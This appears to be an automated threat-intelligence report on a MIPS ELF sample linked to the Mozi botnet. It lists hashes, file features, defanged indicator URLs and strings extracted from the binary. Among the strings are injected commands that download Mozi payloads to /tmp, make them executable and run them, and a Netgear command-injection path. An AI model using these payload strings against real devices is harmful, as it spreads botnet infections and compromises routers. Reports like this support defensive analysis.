i

First submission 2022-10-07 05:33:08 Last sumbission 2024-10-18 04:50:06

File details

File type: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
File size: 300.74 KB (307960 bytes)
MD5: 1af4de72c3ecf9b8b42f585232da79ff
SHA1: c7329de7741529b10c49a0aae595fdbf6ed59374
SHA256: ad23d3c3a70c722f36f005a0660fe2dbf6385fc6da6c799d0feb81599dd7e341

File features detected

Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR

OSINT Enrichments

URLs, FQDN and IP indicators 4

URL Host (FQDN/IP) Date Added
hXXp://59.182.90.228:59206/i VirusTotal Report 59.182.90.228 VirusTotal Report 2024-10-18 04:50:11
hXXp://59.182.90.228:59206/bin.sh VirusTotal Report 59.182.90.228 VirusTotal Report 2024-10-18 04:25:11
hXXp://59.89.237.14:45564/i VirusTotal Report 59.89.237.14 VirusTotal Report 2024-10-17 02:39:10
hXXp://59.89.237.14:45564/bin.sh VirusTotal Report 59.89.237.14 VirusTotal Report 2024-10-17 02:06:10

Strings analysis - File found

XML
M7c.xml

Strings analysis - Possible IPs found 5

192.168.0.100
192.168.1.1
239.255.255.250
192.168.3.1
127.0.0.1

Strings analysis - Possible URLs found 17

http://schemas.xmlsoap.org/soap/envelope/
http://purenetworks.com/HNAP1/
http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
http://%s:%d/Mozi.m+-O+-
http://%s:%d
http://schemas.xmlsoap.org/soap/encoding/
http://www.w3.org/2001/XMLSchema-instance
http://www.w3.org/2001/XMLSchema
http://upx.sf.net
http://%s:%d/Mozi.m;
http://schemas.xmlsoap.org/soap/envelope//
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
http://%s:%d/Mozi.m
http://%s:%d/Mozi.a;sh$
http://%s:%d/Mozi.m;$
http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws